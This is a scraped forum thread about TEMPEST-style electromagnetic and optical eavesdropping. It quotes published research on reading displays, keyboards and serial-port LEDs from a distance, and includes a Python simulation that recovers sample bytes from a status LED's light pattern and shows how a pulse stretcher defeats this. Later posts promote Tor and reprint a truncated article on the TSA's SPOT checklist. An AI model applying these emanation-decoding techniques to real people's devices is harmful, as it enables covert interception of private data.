I respect your opinion and I don't wish to argue against it, but please look at it from the way I and some others have. I want to eliminate the noise created by the LCD monitor. If this was such a common experience, I would expect at least one of the dozens of other electronic equipment to generate some noise, however faint, on FRS - but they do not.

"You are under the wrong impression that somehow RF hash from the back light can somehow carry data. A liquid crystal display (LCD) does not generate its own light like a CRT or plasma screen and requires a light source to make the display visible. Even those that do cannot transmit computer data being none reaches the monitor."

The LCD is connected to a tower, which other devices connect to. Under testing I've heard the CDROM drive accessing data noises within the FRS channels, along with mouse movements and keyboard activity, along with other noises. When I disable the LCD monitor, all of these disturbances vanish. This means the weakness is in the monitor, and my tower is well shielded or shielded enough so as not to generate any noise in radios I can notice. The reference I made to the strange tape and material within the back side of the LCD monitor at the top could be a sign of some type of antenna or device for amping.

"Their FRS radios will only hear what yours does, RF hash, no data whatsoever THAT IS if one is standing outside your house tapping the radio and scratching his head wondering what's the matter with his radio. You and only you know what it is and where it's coming from."

And what of experienced and curious sysadmins? Rogue crackers? Bored HAMs?
Are there any remote radio injection attacks against systems? This is something I'll research later, as I do believe it was mentioned in at least one whitepaper on side channel attacks.

"Thanks for the chuckles, if the report reveals secrets it would not be published but sent by secret courier to the KGB in Moscow."

I'm not aware of any secrets revealed within the document. But it did raise an interesting point without exposing the method(s) delivered to us from an interesting party. This wasn't just some random article written by some anonymous, disturbed fellow and posted to a pastebin or conspiracy minded blog or forum. And one cannot deny the dozens of TEMPEST attacks available today.

"So... all this and no word on moving the radio farther from the monitor. Why don't you try talking somewhere besides in front of the computer if it bothers you so much?"

Thank you for considering conversation as my reason for posting this, but it is not. I would not choose a noisy channel to talk on. Clear conversation is not the point of this thread. I desire the elimination of this garbage coming from the LCD monitor. I don't care if no one in the world can pick up on it and hear it, I would like to properly resolve it and not ignore it.

One can also dredge up the subject of EMF on health, too, but I have not experienced any disturbance of health from exposure to this noise and most people would argue any possible EMF effects on health to be one of one's over active imagination and not real world application.

[-]

A continued discussion was posted elsewhere, this may be useful in the voyage to remove this "noise":

[-]


Any comments on the silver tape and material inside the back of the LCD?

...Disconnection of the LED CDROM and HDD lights could be something I should do to relieve one possible issue.

[-]

Some articles with examples:

"If everything is just right, you can pick up signals from some distance. "I was able to eavesdrop certain laptops through three walls," says Kuhn. "At the CEBIT conference, in 2006, I was able to see the Powerpoint presentation from a stand 25 metres away."

Kuhn also mentioned that one laptop was vulnerable because it had metal hinges that carried the signal of the display cable. I asked if you could alter a device to make it easier to spy on. "There are a lot of innocuous modifications you can make to maximise the chance of getting a good signal," he told me. For example, adding small pieces of wire or cable to a display could make a big difference.

As for defending against this kind of attack, Kuhn says using well-shielded cables, certain combinations of colours and making everything a little fuzzy all work."

- http://www.newscientist.com/blog/technology/2007/...

=!==-!=
TO EASILY VIEW THE PDF files below:
=!==-!=

Online viewer for PDF, PostScript and Word:

"This is an online viewer, with which you can view PDF and PostScript files as browsable images and Word documents as web pages. Given a URL on the net or a file on your computer, the viewer will try to retrieve the document, convert it and show it to you. No plugin software is required."

http://view.samurajdata.se/

The viewer software is open source, licensed under the GNU Public License.
=!==-!=

Electromagnetic eavesdropping risks of flat-panel displays
http://www.cl.cam.ac.uk/~mgk25/pet2004-fpd.pdf

=

Eavesdropping attacks on computer displays
- http://www.cl.cam.ac.uk/~mgk25/...

=

Compromising emanations: eavesdropping risks of computer displays
- http://www.cl.cam.ac.uk/techreports/...
- http://www.cl.cam.ac.uk/techreports/...

=

Compromising emanations of LCD TV sets
- http://www.cl.cam.ac.uk/~mgk25/emc2011-tv.pdf

=

"Q: Can I use filtered fonts also on flat-panel displays?

My experience so far has been that with LCDs, the video cable is the most significant source of radiated information leakage. Where an analogue video cable (with 15-pin VGA connector) is used, low-pass filtered fonts have the same benefits as with CRTs. Where a purely digital video cable is used (DVI-D, laptop-internal displays with FPD/LVDS links, etc.) only the last step, namely randomizing the least-significant bits, should be implemented.

Where the video signal is entirely encoded in digital form, the low-pass filtered step will not have the desired effect. In fact, it can actually increase the differences between the signal generated by individual characters, and thereby make automatic radio character recognition more reliable."

- http://www.cl.cam.ac.uk/~mgk25/emsec/...

=

Remotely Eavesdropping on Keyboards (and read the comments!)

"The researchers from the Security and Cryptography Laboratory at Ecole Polytechnique Federale de Lausanne are able to capture keystrokes by monitoring the electromagnetic radiation of PS/2, universal serial bus, or laptop keyboards. They've outlined four separate attack methods, some that work at a distance of as much as 65 feet from the target.

In one video demonstration, researchers Martin Vuagnoux and Sylvain Pasini sniff out the keystrokes typed into a standard keyboard using a large antenna that's about 20 to 30 feet away in an adjacent room."

- https://www.schneier.com/blog/archives/2008/10/remotely_eavesd.html

=

Video eavesdropping demo at CeBIT 2006
- http://www.lightbluetouchpaper.org/2006/03/09/...

=

Optical Emission Security – Frequently Asked Questions

"Q: What about LEDs?

For devices with RS-232 serial ports, it is customary to provide a status indicator LED for some of the signal lines (in particular transmit data and receive data). Often, these LEDs are directly connected to the line via just a resistor. As a result, anyone with a line of sight to the LED, some optics and a simple photosensor can see the data stream. Joe Loughry and David A. Umphress have recently announced a detailed study (submitted to ACM Transactions on Information and System Security) in which they tested 39 communications devices with 164 LED indicators, and on 14 of the tested devices they found serial port data in the LED light. Based on their findings, it seems reasonable to conclude that LEDs for RS-232 ports are most likely carrying the data signal today, whereas LEDs on high-speed data links (LANs, harddisk) do not. Even these LEDs are still available as a covert channel for malicious software that actively tries to transmit data optically.

I expect that this paper will cause a number of modem manufacturers to add a little pulse stretcher (monostable multivibrator) to the LEDs in the next chip set revision, and that at some facilities with particular security concerns, the relevant LEDs will be removed or covered with black tape.

The data traffic on LEDs is not a periodic signal, and therefore, unlike with video signals, periodic averaging cannot be used to improve the signal-to-noise ratio. The shot-noise limit estimation technique that I used to estimate the CRT eavesdropping risk can even more easily (because no deconvolution is needed) also be applied to serial port indicators and allows us to estimate a lower bound for the bit-error rate at a given distance. I have performed a few example calculations and concluded that with a direct line of sight, and a 100 kbit/s signal (typical for an external telephone modem), at 500 m distance it should be no problem to acquire a reliable signal (one wrong bit every 10 megabit), whereas for indirect reflection from the wall of a dark room, a somewhat more noisy signal (at least one wrong bit per 10 kilobit) can be expected to be receivable in a few tens of meters distance."

- http://www.cl.cam.ac.uk/~mgk25/emsec/...

=

Ancient Story on Slashdot: Coming to a Desktop near you: Tempest Capabilities

"New Scientist has an interesting article about a new toy we will all want. It's a card that plugs in one of your PCI slots and allows you to scan the EMF spectrum and read your neighbour's terminal. In about 5 years you might be able to get one for just under £1000. (Modern Tempest Hardware costs about £30000)"

http://www.yro.slashdot.org/story/99/11/08/...

=

"Any unshielded electrical device with a variable current (including LCDs) will give out EMF radiation. It's the nature of the beast.

For that matter, light is EMF radiation, so unless you have your LCD in a coal-mine, it's reflecting EMF all the time it's switched on.

Then, there's the fact that screen monitoring isn't the only monitoring you can do. I used to use a radio, tuned into the bus for the PET, as a sound card. Worked surprisingly well, for all that very clunky metal shielding. What's to stop a much higher-quality receiver from seeing the data, in an unshielded box, being sent TO the LCD, or to any other device on the machine?

It's a mistake to assume that Tempest technology is single-function and that that single-function only works in a single situation."

- http://slashdot.org/comments.pl?...

=

800Mbps Wireless Network Made With LED Light Bulbs
- http://science.slashdot.org/story/11/08/02/...

=

There are a lot of other files, many in PPT format, which can be found easily on this subject of LCD monitor (and other computing devices) TEMPEST sniffing.

===

Sources for this discussion:

- http://forums.radioreference.com/computer/...
- http://clsvtzwzdgzkjda7.onion/viewtopic.php?...

.onion link above requires a running Tor client session in order to view. (https://www.torproject.org)

This on-going discussion backed up to Pastebin(s) in order to retain it as an artifact. Many of these
types of discussions are REMOVED from the net because of the nature of the discussion (TEMPEST).

__________________
Test your connection for leaks:
http://ip-check.info/?lang=en

Use TAILS
https://tails.boum.org/

How to boot from USB and other great stuff:
http://www.rmprepusb.com/

Open pdf and word files online instead of on your puter'
http://view.samurajdata.se/

USE the net more securely:
https://pressfreedomfoundation.org/blog/2014/04/help-support-little-known-privacy-tool-has-been-critical-journalists-reporting-nsa
https://www.torproject.org/download/download

http://www.theintelligencenews.com/


"The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes......"



"There's a war out there, old friend. A world war. And it's not about who's got the most bullets. It's about who controls the information.... it's all about the information!"
0
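The optical-emission FAQ quoted in the post above says that status LEDs wired to a serial line through just a resistor carry the data stream, and that a pulse stretcher (monostable multivibrator) would address this. The following simulation is an added illustration, not code from the FAQ, the thread, or any vendor; it compares the two LED drive schemes on a constructed 8N1 frame, and the sample rate, hold time, LED polarity and sample message are all assumptions.

```python
# Added simulation; every value here is constructed for illustration.
SAMPLES_PER_BIT = 8    # simulation resolution (assumption)
HOLD_BITS = 40         # monostable hold time, in bit periods (assumption)
MESSAGE = b"PIN=4921"  # constructed sample traffic


def uart_line(data, idle_bits=4):
    """8N1 framing: line idles high, start bit 0, 8 data bits LSB first, stop bit 1."""
    bits = [1] * idle_bits
    for byte in data:
        bits.append(0)
        bits.extend((byte >> k) & 1 for k in range(8))
        bits.append(1)
    bits.extend([1] * idle_bits)
    return [b for b in bits for _ in range(SAMPLES_PER_BIT)]


def led_direct(line):
    """LED behind a resistor only: lit whenever the line is low (polarity assumed)."""
    return [1 - level for level in line]


def led_stretched(line, hold=HOLD_BITS * SAMPLES_PER_BIT):
    """Retriggerable monostable: each falling edge lights the LED for `hold` samples."""
    out, remaining, prev = [], 0, 1
    for level in line:
        if prev == 1 and level == 0:
            remaining = hold
        out.append(1 if remaining > 0 else 0)
        remaining = max(0, remaining - 1)
        prev = level
    return out


def decode_from_led(led):
    """What the light alone reveals: treat LED-on as line-low and apply 8N1 decoding."""
    line = [1 - v for v in led]
    out, i, n = bytearray(), 1, len(line)
    while i < n:
        if line[i - 1] == 1 and line[i] == 0:           # falling edge: start bit
            centre = i + SAMPLES_PER_BIT // 2
            idx = [centre + k * SAMPLES_PER_BIT for k in range(10)]
            if idx[-1] >= n:
                break
            frame = [line[j] for j in idx]
            if frame[0] == 0 and frame[9] == 1:         # valid start and stop bits
                out.append(sum(bit << k for k, bit in enumerate(frame[1:9])))
                i = idx[-1]                             # resume inside the stop bit
                continue
        i += 1
    return bytes(out)


if __name__ == "__main__":
    line = uart_line(MESSAGE)
    # Direct drive: the light pattern is the bit stream, so the bytes come back.
    print("direct LED   :", decode_from_led(led_direct(line)))
    # Stretched: one long flash per burst; only the timing of activity remains.
    print("stretched LED:", decode_from_led(led_stretched(line)))
```
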
hannah

Registered:
Posts: 797
Reply with quote  #10 
EVERYONE PLEASE USE TOR AND HELP THE NETWORK GROW BY BECOMING A TOR RELAY OR BRIDGE - DEFEAT CENSORSHIP AND POLITICAL OPPRESSION

BESIDES MAKING YOUR COMMUNICATIONS MORE SECURE, YOU CAN HELP OTHERS



You will help the network speed up bandwidth.
You will help people living under oppressive political regimes have freedom of speech and communications.
You can help cause regime change in China, Iran and Syria.
A non-exit TOR Relay allows encrypted data to flow through the network smoothly and it starts automatically when you log in. It does not affect your normal use of TOR.

Download here:

https://www.torproject.org/download/download


Use the Vidalia bundle for your personal encrypted web surfing

Use the relay bundle or bridge bundle TO HELP EXPAND THE NETWORK

0
joeb

Registered:
Posts: 8,748
Reply with quote  #11 

https://firstlook.org/theintercept/2015/03/27/revealed-tsas-closely-held-behavior-checklist-spot-terrorists/



Exclusive: TSA’s Secret Behavior Checklist to Spot Terrorists

Friday April 3 2015


Fidgeting, whistling, sweaty palms. Add one point each. Arrogance, a cold penetrating stare, and rigid posture, two points.

These are just a few of the suspicious signs that the Transportation Security Administration directs its officers to look out for — and score — in airport travelers, according to a confidential TSA document obtained exclusively by The Intercept.

The checklist is part of TSA’s controversial program to identify potential terrorists based on behaviors that it thinks indicate stress or deception — known as the Screening of Passengers by Observation Techniques, or SPOT. The program employs specially trained officers, known as Behavior Detection Officers, to watch and interact with passengers going through screening.

The document listing the criteria, known as the “Spot Referral Report,” is not classified, but it has been closely held by TSA and has not been previously released. A copy was provided to The Intercept by a source concerned about the quality of the program.

The checklist ranges from the mind-numbingly obvious, like “appears to be in disguise,” which is worth three points, to the downright dubious, like a bobbing Adam’s apple. Many indicators, like “trembling” and “arriving late for flight,” appear to confirm allegations that the program picks out signs and emotions that are common to many people who fly.

A TSA spokesperson declined to comment on the criteria obtained by The Intercept. “Behavior detection, which is just one element of the Transportation Security Administration’s (TSA) efforts to mitigate threats against the traveling public, is vital to TSA’s layered approach to deter, detect and disrupt individuals who pose a threat to aviation,” a spokesperson said in an emailed statement.

Since its introduction in 2007, the SPOT program has attracted controversy for the lack of science supporting it. In 2013, the Government Accountability Office found that there was no evidence to back up the idea that “behavioral indicators … can be used to identify persons who may pose a risk to aviation security.” After analyzing hundreds of scientific studies, the GAO concluded that “the human ability to accurately identify deceptive behavior based on behavioral indicators is the same as or slightly better than chance.”

The inspector general of the Department of Homeland Security found in 2013 that TSA had failed to evaluate SPOT, and “cannot ensure that passengers at United States airports are screened objectively, show that the program is cost-effective, or reasonably justify the program’s expansion.”

Despite those concerns, TSA has trained and deployed thousands of Behavior Detection Officers, and the program has cost more than $900 million since it began in 2007, according to the GAO.

The 92-point checklist listed in the “Spot Referral Report” is divided into various categories with a point score for each. Those categories include a preliminary “observation and behavior analysis,” and then those passengers pulled over for additional inspection are scored based on two more categories: whether they have “unusual items,” like almanacs and “numerous prepaid calling cards or cell phones,” and a final category for “signs of deception,” which include “covers mouth with hand when speaking” and “fast eye blink rate.”

Points can also be deducted from someone’s score based on observations about the traveler that make him or her less likely, in TSA’s eyes, to be a terrorist. For example, “apparent” married couples, if both people are over 55, have two points deducted off their score. Women over the age of 55 have one point deducted; for men, the point deduction doesn’t come until they reach 65.

Last week, the ACLU sued TSA to obtain records related to its behavior detection programs, alleging that they lead to racial profiling. The lawsuit is based on a Freedom of Information Act request the ACLU filed last November asking for numerous documents related to the program, including the scientific justification for the program, changes to the list of behavior indicators, materials used to train officers and screen passengers, and what happens to the information collected on travelers.

“The TSA has insisted on keeping documents about SPOT secret, but the agency can’t hide the fact that there’s no evidence the program works,” said Hugh Handeyside, staff attorney with the ACLU National Security Project, in a statement announcing the lawsuit.

Being on the lookout for suspicious behavior is a “common sense approach” that is used by law enforcement, according to TSA. “No single behavior alone will cause a traveler to be referred to additional screening or will result in a call to a law enforcement officer (LEO),” the agency said in its emailed statement. “Officers are trained and audited to ensure referrals for additional screening are based only on observable behaviors and not race or ethnicity.”

One former Behavior Detection Officer manager, who asked not to be identified, said that SPOT indicators are used by law enforcement to justify pulling aside anyone officers find suspicious, rather than acting as an actual checklist for specific indicators. “The SPOT sheet was designed in such a way that virtually every passenger will exhibit multiple ‘behaviors’ that can be assigned a SPOT sheet value,” the former manager said.

The signs of deception and fear “are ridiculous,” the source continued. “These are just ‘catch all’ behaviors to justify BDO interaction with a passenger. A license to harass.”

The observations of a TSA screener or a Behavior Detection Officer shouldn’t be the basis for referring someone to law enforcement. “The program is flawed and unnecessarily delays and harasses travelers. Taxpayer dollars would be better spent funding real police at TSA checkpoints,” the former manager said.

A second former Behavior D
0
Copyright © 2001-2004 Who's A Rat. All Rights Reserved.
Reproduction in whole or in part in any form or medium without express written permission is prohibited.